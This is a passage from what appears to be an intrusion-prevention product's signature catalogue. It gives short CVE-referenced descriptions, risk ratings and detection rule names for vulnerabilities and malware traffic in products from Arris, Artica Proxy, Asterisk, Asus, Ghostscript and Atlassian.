Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Arris VAP2500
Type: Code Injection
Description: A vulnerability in Arris VAP2500 management portal, before version FW08.41, which allows remote attackers to execute arbitrary commands via the tools_command.php page.
Situation: HTTP_CRL-Arris-VAP2500-Management-Portal-Command-Execution
References:
CVE-2014-8423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8423
Back to top

ARS-VBS-Loader-C2-Traffic

About this vulnerability: ARS VBS Loader C2 Traffic traffic was detected
Risk: High
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: ARS VBS Loader traffic was detected. This malicious loader is able to control victim's machine comprehensively. Usually it downloads some other malware to the system.
Situation: HTTP_CSU-ARS-VBS-Loader-C2-Traffic
Back to top

Artica-Proxy-Cyrus.php-Command-Injection

About this vulnerability: A vulnerability in Artica Tech Artica Proxy
Risk: Moderate
First detected in: sgpkg-ips-1273-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Artica Tech Artica Proxy; Artica Tech Artica Mail appliance
Type: Input Validation
Description: There exists a command injection vulnerability in Artica Proxy. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-Artica-Proxy-Cyrus.php-Command-Injection
References:
CVE-2020-17505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17505
Back to top

Artica-Proxy-FW-Progress-Details-Directory-Traversal

About this vulnerability: A vulnerability in Artica Tech Artica Proxy
Risk: Moderate
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Artica Tech Artica Proxy
Type: Directory Traversal
Description: Insufficient input validation of request parameters in fw.progress.details.php causes a directory traversal vulnerability in Artica Proxy. A successful exploit allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CS-Artica-Proxy-FW-Progress-Details-Directory-Traversal
References:
CVE-2020-13158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13158
Back to top

Artica-Proxy-Fw.login.php-Apikey-SQL-Injection

About this vulnerability: A vulnerability in Artica Tech Artica Proxy
Risk: High
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Artica Tech Artica Proxy
Type: Input Validation
Description: A SQL injection vulnerability has been reported in Artica Proxy. The vulnerability is due to insufficient input validation in the apikey parameter within fw.login.php. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL code, potentially leading to bypass privilege and remote code execution.
Situation: HTTP_CSU-Artica-Proxy-Fw.login.php-Apikey-SQL-Injection
References:
CVE-2020-17506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506
Back to top

Artica-Proxy-Images.listener.php-Arbitrary-File-Read

About this vulnerability: A vulnerability in Artica Tech Artica Proxy
Risk: High
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1711-5242
Platform: Generic
Software: Artica Tech Artica Proxy
Type: Input Validation
Description: An arbitrary file read vulnerability has been reported in Artica Proxy. The vulnerability is due to improper HTTP request parameter sanitization. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary file read.
Situation: HTTP_CSU-Artica-Proxy-Images.listener.php-Arbitrary-File-Read
References:
CVE-2024-2053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2053
Back to top

Artica-Proxy-Squid.conf-Authentication-Bypass

About this vulnerability: A vulnerability in Artica Proxy
Risk: High
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1724-5242
Platform: Generic
Software: Artica Tech Artica Proxy
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Artica Proxy due to improper access configuration. Successful exploitation could result in remote command execution under the security context of the root user.
Situation: HTTP_CS-Artica-Proxy-Squid.conf-Authentication-Bypass
Generic_CS-Artica-Proxy-Squid.conf-Authentication-Bypass
References:
CVE-2024-2056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2056
Back to top

Artica-Proxy-Wiz.wizard.progress.php-Insecure-Deserialization

About this vulnerability: A vulnerability in Artica Tech Artica Proxy
Risk: High
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1711-5242
Platform: Generic
Software: Artica Tech Artica Proxy
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Artica Proxy. The vulnerability is due to improper HTTP request parameter sanitization. A remote, unauthenticated attacker could exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could result in remote command execution under the security context of the PHP interpreter.
Situation: HTTP_CSU-Artica-Proxy-Wiz.wizard.progress.php-Insecure-Deserialization
References:
CVE-2024-2054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2054
Back to top

Artifex-Ghostscript-PostScript-Handling-S_xbcpe_process-Buffer-Overflow

About this vulnerability: A vulnerability in Artifex Software Ghostscript
Risk: High
First detected in: sgpkg-ips-1587-5242
Last changed: sgpkg-ips-1587-5242
Platform: Generic
Software: Ghostscript
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in Ghostscript. This vulnerability is due to insufficient handling of a malicious PostScript file. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted file to an application using a vulnerable version of Ghostscript. Successful exploitation can lead to code execution under the security context of the target application.
Situation: File-Text_Artifex-Ghostscript-PostScript-Handling-S_xbcpe_process-Buffer-Overflow
References:
CVE-2023-28879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28879
Back to top

Artifex-Ghostscript-PostScript-Sandbox-Bypass-CVE-2018-17961

About this vulnerability: A vulnerability in Ghostscript
Risk: High
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Platform: Generic
Software: Ghostscript
Type: Malfunction
Description: A sandbox bypass vulnerability has been reported in Artifex Ghostscript 9.25 and earlier due to Postscript error handling. Successful exploitation can lead to code execution under the security context of the target application.
Situation: File-Text_Artifex-Ghostscript-PostScript-Sandbox-Bypass-CVE-2018-17961
References:
CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
Back to top

ASePortal-Parameter-SQL-Injection

About this vulnerability: An ASePortal Parameter SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-727-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ASePortal
Type: SQL Injection
Description: A vulnerability in ASePortal, versions 2.4 - 2.5, which allows remote attackers to retrieve the admin session from the database through SQL injection which can be used to take over the admin user session, allowing the attacker to upload arbitrary code.
Situation: HTTP_CRL-ASePortal-Parameter-SQL-Injection
References:
CVE-2008-5191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5191
OSVDB-46567
http://www.osvdb.org/46567
Back to top

Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Ask Toolbar allows arbitary code execution
Risk: High
First detected in: sgpkg-ips-163-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ask Toolbar
Type: Malfunction
Description: There is a buffer overflow vulnerability in the Ask Toolbar ActiveX control. This may lead to code execution with the privileges of the currently logged in user.
Situation: HTTP_SS-Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow
File-Text_Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow
References:
CVE-2007-5107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5107
BID-25785
http://www.securityfocus.com/bid/25785
Back to top

Asn-1-Bitstring-Overflow-MS04-007

About this vulnerability: Remote system compromise using ASN.1 library weakness (MS04-007)
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: ASN.1 library weakness could lead to remote system compromise with SYSTEM privileges using one of the multiple integer overflow vulnerabilities.
Situation: HTTP_CSH-Asn-1-Bitstring-Overflow-MS04-007
References:
CVE-2005-1935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1935
MS04-007
http://technet.microsoft.com/security/bulletin/MS04-007
Back to top

Asn-1-Integer-BOF-MS04-007

About this vulnerability: Remote system compromise using ASN.1 library weakness (MS04-007)
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Integer Overflow
Description: ASN.1 library weakness could lead to remote system compromise with SYSTEM privileges using one of the multiple integer overflow vulnerabilities.
Situation: ASN.1_Invalid-Bitstring
ASN.1_Oversize-Block
HTTP_CS-Asn-1-Integer-BOF-MS04-007
HTTP_CS-Suspicious-HTTP-Authorization-Negotiate-Token
SMTP_CCS-Asn-1-Integer-BOF-MS04-007
HTTPS_CS-SSL-ASN.1-Bruteforcer-Tool-Usage
SMB-TCP_CHS-Asn-1-Integer-BOF-MS04-007
SMB-TCP_CHS-Asn-1-Integer-BOF-MS04-007-2
References:
CVE-2003-0818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0818
BID-9635
http://www.securityfocus.com/bid/9635
MS04-007
http://technet.microsoft.com/security/bulletin/MS04-007
Back to top

ASP.NET-Information-Disclosure-Vulnerability

About this vulnerability: A vulnerability in Microsoft ASP.NET
Risk: High
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft ASP.NET
Type: Misconfiguration
Description: An information disclosure vulnerability exists in Microsoft ASP .NET. The vulnerability is due to the inclusion of configuration file contents in error pages under certain circumstances. A remote, unauthenticated attacker can exploit this vulnerability by sending a request crafted to elicit an error message from the server. Successful exploitation of this vulnerability would expose contents of a web configuration file to the attacker in the resulting error message.
Situation: HTTP_CSU-ASP.NET-Information-Disclosure-Vulnerability-CVE-2015-1648
References:
CVE-2015-1648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1648
MS15-041
http://technet.microsoft.com/security/bulletin/MS15-041
Back to top

Asterisk-AMI-Originate-Authenticated-RCE

About this vulnerability: A vulnerability in Asterisk
Risk: High
First detected in: sgpkg-ips-1806-5242
Last changed: sgpkg-ips-1806-5242
Platform: Unix
Software: Asterisk
Type: Input Validation
Description: A vulnerability in Asterisk, versions before 18.24.2, 20.9.2, and 21.4.2 and certified-asterisk, which allows remote attackers to change all configuration files in the '/etc/asterisk/' directory.
Situation: Generic_CS-Asterisk-AMI-Originate-Authenticated-RCE
References:
CVE-2024-42365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42365
Back to top

Asterisk-Cdr_Object_Update_Party_B_Userfield_Cb-Buffer-Overflow

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Buffer Overflow
Description: An insufficient length check causes a buffer overflow vulnerability in Digium Asterisk. A successful exploitation allows an attacker to run arbitrary code in the system with the privileges of the daemon.
Situation: SIP_Digium-Asterisk-Cdr_Object_Update_Party_B_Userfield_Cb-Buffer-Overflow
References:
CVE-2017-16671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16671
Back to top

Asterisk-Management-Interface-HTTP-Digest-Authentication-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Digium Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-445-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Digium Asterisk
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Digium Asterisk. The vulnerability is due to a bounds checking error while handling HTTP Digest Authentication headers in the ast_parse_digest() function used by the Asterisk management interface. A remote, unauthenticated attacker can exploit this vulnerability to overflow a stack-based buffer and possibly execute arbitrary code in the context of the vulnerable application. An unsuccessful exploit attempt may lead to a denial-of-service condition.
Situation: HTTP_CSH-Asterisk-Management-Interface-Digest-Authentication-Stack-BOF
Back to top

Asterisk-pjsip-Endpoint-Presence-Disclosure

About this vulnerability: A vulnerability in Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk Open Source; Digium Certified Asterisk
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Asterisk. The vulnerability is due to improper responses when blocking SIP requests if the target system is configured with endpoint-specific ACL rules. An attacker can exploit this vulnerability by sending SIP requests to the target system. Successful exploitation could result in the endpoint presence disclosure to the remote user.
Situation: SIP-UDP_Asterisk-pjsip-Endpoint-Presence-Disclosure
References:
CVE-2018-12227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12227
Back to top

Asterisk-pjsip-Invalid-Fmtp-Media-Attribute-Denial-Of-Service

About this vulnerability: A vulnerability in Asterisk Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Input Validation
Description: There has been reported a denial-of-service vulnerability in Asterisk PJSIP. A remote attacker can exploit this vulnerability by sending a crafted SDP message to the target server. Successful exploitation can lead to denial-of-service conditions.
Situation: SIP_Asterisk-pjsip-Invalid-Fmtp-Media-Attribute-Denial-Of-Service
References:
CVE-2018-1000099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000099
Back to top

Asterisk-Res_pjsip_pubsub-Module-SIP-Subscribe-Type-Confusion-Denial-Of-Service

About this vulnerability: A vulnerability in Asterisk Open Source
Risk: High
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Input Validation
Description: A denial of service vulnerability exists in Asterisk Open Source. The vulnerability exists in the res_pjsip_pubsub module. The vulnerability is due to the way SIP SUBSCRIBE requests with unexpected mixes of headers for a given event package are handled. Remote, unauthenticated attackers could exploit this vulnerability by sending malformed SIP SUBSCRIBE requests to the vulnerable server. Successful exploitation would result in a denial of service condition.
Situation: SIP-UDP_Digium-Asterisk-Res_pjsip_pubsub-Module-SIP-Subscribe-Type-Confusion-Denial-Of-Service
References:
CVE-2014-6609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6609
OSVDB-111730
http://www.osvdb.org/111730
Back to top

Asterisk-SIP-Channel-Driver-Remote-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Digium Asterisk
Risk: High
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Input Validation
Description: There is a denial of service in the Asterisk IPBX SIP channel driver that can be triggered by sending a SIP BYE message with an "Also" header.
Situation: SIP-UDP_Asterisk-SIP-Channel-Driver-Remote-Denial-Of-Service
References:
BID-27110
http://www.securityfocus.com/bid/27110
Back to top

Asterisk-SIP-Invite-Malformed-SDP-Denial-of-Service

About this vulnerability: A denial of service vulnerability in Digium Asterisk
Risk: High
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Input Validation
Description: There is a denial of service in the Asterisk voice over IP telephone system that can be triggered by sending a crafted SIP INVITE request with malformed SDP data.
Situation: SIP-UDP_Asterisk-SIP-Invite-Malformed-SDP-Denial-of-Service
References:
CVE-2007-1561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1561
BID-23031
http://www.securityfocus.com/bid/23031
OSVDB-34479
http://www.osvdb.org/34479
Back to top

Asterisk-Skinny-Channel-Driver-Remote-Denial-of-Service-Vulnerability

About this vulnerability: A vulnerability in Asterisk
Risk: High
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Malfunction
Description: The Skinny channel driver (chan_skinny) in Asterisk Open Source before 1.4.10, AsteriskNOW before beta7, Appliance Developer Kit before 0.7.0, and Appliance s800i before 1.0.3 allows remote authenticated users to cause a denial of service (application crash) via a CAPABILITIES_RES_MESSAGE packet with a capabilities count larger than the capabilities_res_message array population.
Situation: Generic_CS-Asterisk-Skinny-Channel-Driver-Remote-Denial-of-Service-Vulnerability
References:
CVE-2007-4280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4280
BID-25228
http://www.securityfocus.com/bid/25228
Back to top

Asterisk-Skinny-Channel-Get-Input-Integer-Overflow

About this vulnerability: Integer overflow vulnerability in the Skinny channel driver in Asterisk
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk
Type: Buffer Overflow
Description: Asterisks Skinny channel driver has a vulnerability in input validation. A Skinny protocol message with an invalid size field can be used to cause a buffer overflow and to execute arbitrary code on the target system. The vulnerability can be triggered before authentication.
Situation: Generic_CS-Asterisk-Skinny-Channel-Get-Input-Integer-Overflow
References:
CVE-2006-5444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5444
BID-20617
http://www.securityfocus.com/bid/20617
OSVDB-29972
http://www.osvdb.org/29972
Back to top

Asterisk-TLS-HTTP-Content-Length-Denial-Of-Service

About this vulnerability: A vulnerability in Asterisk Open Source
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Digium Asterisk Open Source
Type: Infinite Loop
Description: A denial-of-service vulnerability has been reported in Asterisk. The vulnerability is due to improper handling of client abrupt disconnection or client-supplied messages when client is connecting via TLS. A remote user can exploit the vulnerability by abruptly disconnecting or sending specially crafted data via TLS to cause target system entering infinite loop. Successful exploitation can result in denial-of-service conditions.
Situation: HTTP_CS-Asterisk-TLS-HTTP-Content-Length-Denial-Of-Service
References:
CVE-2018-12228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12228
Back to top

Astium-Remote-Code-Execution

About this vulnerability: An Astium Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Astium
Type: PHP Injection
Description: A vulnerability in Astium, versions 2.1-25399 and before, that allows remote attackers to gain admin access through SQL injections, and upload and execute arbitrary PHP code.
Situation: File-Text_Astium-Remote-Code-Execution
References:
OSVDB-88860
http://www.osvdb.org/88860
Back to top

Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow

About this vulnerability: A vulnerability in Astonsoft DeepBurner
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Astonsoft DeepBurner
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Astonsoft Deepburner. The application fails to sanitize user supplied input leading to a buffer overflow condition. A successful exploitation may lead to code execution in the context of the current user.
Situation: HTTP_SS-Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow
File-TextId_Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow
References:
CVE-2006-6665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6665
BID-21657
http://www.securityfocus.com/bid/21657
OSVDB-32356
http://www.osvdb.org/32356
Back to top

Asus-Net4Switch-ActiveX-Buffer-Overflow

About this vulnerability: An ASUS Net4Switch ActiveX Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP SP3
Software: ASUS Net4Switch
Type: Buffer Overflow
Description: A vulnerability in ASUS Net4Switch, version 1.0.0020, which allows remote attackers to execute arbitrary code via a long Alert method parameter.
Situation: File-Text_JavaScript-ShellCode-Generation
References:
CVE-2012-4924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4924
OSVDB-79438
http://www.osvdb.org/79438
Back to top

Asus-Net4Switch-Ipswcom.dll-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in ASUS Net4Switch ipswcom.dll
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ASUS Net4Switch
Type: Buffer Overflow
Description: There exists a vulnerability in ASUS Net4Switch. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Asus-Net4Switch-Ipswcom.dll-ActiveX-Control-Stack-Buffer-Overflow
References:
BID-52110
http://www.securityfocus.com/bid/52110
OSVDB-79438
http://www.osvdb.org/79438
Back to top

Asus-Remote-Console-DPC-Proxy-Server-Buffer-Overflow

About this vulnerability: Asus Remote Console DPC Proxy server 2.0.0.19 and 2.0.0.24 Buffer Overflow
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DPC Proxy Server
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Asus Remote Console DPC Proxy server 2.0.0.19 and 2.0.0.24, which allows attackers to remotly execute arbitrary code via a long string.
Situation: Generic_CS-Asus-Remote-Console-DPC-Proxy-Server-Buffer-Overflow
References:
CVE-2008-1491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1491
BID-28394
http://www.securityfocus.com/bid/28394
OSVDB-43638
http://www.osvdb.org/43638
Back to top

Asus-RT-AC3200-Command-Injection

About this vulnerability: A vulnerability in Asus RT AC3200
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: ASUS RT
Type: Input Validation
Description: A system command injection vulnerability has been reported in appGet.cgi on ASUS RT-AC3200.
Situation: HTTP_CRL-Asus-RT-AC3200-Command-Injection
References:
CVE-2018-14714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14714
Back to top

Asus-RT-N56U-Remote-Password-Disclosure

About this vulnerability: Asus-RT-N56U fw version 1.0.1.4 and older remote password disclosure vulnerability
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: ASUS RT
Type: Input Validation
Description: A validation vulnerability in ASUS-RT-N56U that allows an attacker on the same network to retrieve a web page containing device configuration and the devices administrator password without having proper login credentials.
Situation: HTTP_CSU-Asus-RT-N56U-Remote-Password-Disclosure
Back to top

AsusWRT-Lan-Unauthenticated-Remote-Code-Execution

About this vulnerability: An AsusWRT LAN Unauthenticated Remote Code Execution Vulnerability
Risk: High
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AsusWRT
Type: Input Validation
Description: A vulnerability in AsusWRT, version 3.0.0.4.380.7743, which allows remote attackers to enable a special comand mode via a POST to port 80, which then may allow direct command execution via UDP packets to port 9999.
Situation: HTTP_CS-AsusWRT-Lan-Unauthenticated-Remote-Code-Execution
References:
CVE-2018-5999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5999
Back to top

AsyncRAT-Infection-Traffic

About this vulnerability: AsyncRAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1361-5242
Last changed: sgpkg-ips-1361-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: AsyncRAT infection traffic was detected.
Situation: TLS_SS-AsyncRAT-Infection-Traffic
Back to top

Atftp-TFTP-Server-Error-Packet-DoS

About this vulnerability: A vulnerability in atftp TFTP Server
Risk: High
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: atftpd
Type: Integer Overflow
Description: A vulnerability in atftp TFTP server, version 0.7.1, which allows remote attackers to cause a denial of service condition by sending a specially crafted error packet to the target server, due to improper validation of the length of the error packet before performing strncpy() call.
Situation: Generic_UDP-Atftp-TFTP-Server-Error-Packet-DoS
TFTP_CS-Atftp-TFTP-Server-Error-Packet-DoS
References:
CVE-2019-11365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11365
Back to top

AtHoc-IWSAlerts-ActiveX-Control-ControlFile-Buffer-Overflow

About this vulnerability: A vulnerability in AtHoc IWSAlerts ActiveX Control
Risk: High
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AtHoc IWSAlerts
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the AtHoc IWSAlerts ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of the CompleteInstallation() method. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows for arbitrary code injection and execution with the privileges of the currently logged in user.
Situation: HTTP_SS-AtHoc-IWSAlerts-ActiveX-Control-Buffer-Overflow
File-Text_AtHoc-IWSAlerts-ActiveX-Control-Buffer-Overflow
Back to top

Atlassian-Bitbucket-Server-And-Data-Center-Command-Injection

About this vulnerability: A vulnerability in Atlassian Bitbucket Server
Risk: High
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1507-5242
Platform: Generic
Software: Atlassian Bitbucket
Type: Input Validation
Description: A command injection vulnerability has been reported in Atlassian Bitbucket Server and Data Center. The vulnerability is due to improper validation of certain user input fields. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the affected system. Successful exploitation of the vulnerability could lead to arbitrary command execution under the security context of the service.
Situation: HTTP_CRL-Atlassian-Bitbucket-Server-And-Data-Center-Command-Injection
References:
CVE-2022-36804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
Back to top

Atlassian-Bitbucket-Server-And-Data-Center-CVE-2022-43781-Command-Injection

About this vulnerability: A vulnerability in Atlassian Bitbucket Server and Data Center
Risk: Moderate
First detected in: sgpkg-ips-1537-5242
Last changed: sgpkg-ips-1537-5242
Platform: Generic
Software: Atlassian Bitbucket
Type: Input Validation
Description: Improper validation of usernames on the server causes a command injection vulnerability in Atlassian Bitbucket. A successful exploit allows an attacker to execute arbitrary commands with the privileges of the vulnerable application.
Situation: HTTP_CRL-Atlassian-Bitbucket-Server-And-Data-Center-CVE-2022-43781-Command-Injection
References:
CVE-2022-43781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43781
Back to top

Atlassian-Companion-Remote-Code-Execution-CVE-2023-22524

About this vulnerability: An attempt to exploit a vulnerability in macOS detected
Risk: High
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Platform: Mac OS X
Software: Atlassian Companion
Type: Input Validation
Description: Atlassian Companion application for MacOS prior to version 2.0.0 was affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion's blocklist and macOS Gatekeeper to allow execution of code.
Situation: File-Text_Atlassian-Companion-Suspicious-Script
File-TextId_MacOS-Suspicious-Shortcut-File
References:
CVE-2023-22524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22524
Back to top

Atlassian-Confluence-Data-Center-And-Server-addlanguage-RCE

About this vulnerability: An attempt to exploit a vulnerability in Confluence Data Center and Server detected
Risk: High
First detected in: sgpkg-ips-1746-5242
Last changed: sgpkg-ips-1746-5242
Platform: Linux; Windows
Software: Atlassian Confluence
Type: Input Validation
Description: A vulnerability in Confluence Data Center and Server, multiple versions, which allows remote attackers to execute arbitrary code by sending crafted requests to the target server, due to improper validation of incoming requests.
Situation: HTTP_CS-Atlassian-Confluence-Data-Center-And-Server-addlanguage-RCE
References:
CVE-2024-21683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21683
Back to top

Atlassian-Confluence-Server-Packageresourcemanager-Information-Disclosure

About this vulnerability: A vulnerability in Atlassian Confluence Server
Risk: Moderate
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Confluence
Type: Input Validation
Description: There exists an information disclosure vulnerability in Atlassian Confluence Server. Successful exploitation could lead in local file disclosure.
Situation: HTTP_CLR-Atlassian-Confluence-Server-Packageresourcemanager-Information-Disclosure
References:
CVE-2019-3394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3394
Back to top

Atlassian-Confluence-Server-S-Endpoint-Information-Disclosure

About this vulnerability: A vulnerability in Atlassian Confluence Server
Risk: Moderate
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Platform: Generic
Software: Confluence
Type: Input Validation
Description: Improper validation of paths causes an information disclosure vulnerability in Atlassian Confluence. A successful exploitation can result in local file disclosure.
Situation: HTTP_CSU-Atlassian-Confluence-Server-S-Endpoint-Information-Disclosure
References:
CVE-2021-26085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26085
Back to top

Atlassian-Crowd-pdkinstall-CVE-2019-11580

About this vulnerability: A vulnerability in Atlassian Crowd
Risk: High
First detected in: sgpkg-ips-1306-5242
Last changed: sgpkg-ips-1306-5242
Platform: Generic
Software: Atlassian Crowd
Type: Insecure Configuration
Description: Atlassian Crowd and Crowd Data Center release builds had incorrectly enabled the pdkinstall development plugin. A successful exploitation of this vulnerability may allow arbitrary plugin installation, which may permit remote code execution on vulnerable versions of Atlassian Crowd and Crowd Data Center.
Situation: HTTP_CRL-Atlassian-Crowd-pdkinstall-CVE-2019-11580-2
HTTP_CRL-Atlassian-Crowd-pdkinstall-CVE-2019-11580-1
References:
CVE-2019-11580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11580
Back to top

Atlassian-Fisheye-And-Crucible-Mostactivecommitters-Information-Disclosure

About this vulnerability: A vulnerability in Atlassian Crucible
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Atlassian Crucible; Atlassian FishEye
Type: Malfunction
Description: There exists an information disclosure vulnerability in Atlassian FishEye and Crucible. A remote attacker can use this to disclose sensitive information.
Situation: HTTP_CSU-Atlassian-Fisheye-And-Crucible-Mostactivecommitters-Information-Disclosure
References:
CVE-2017-9512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9512
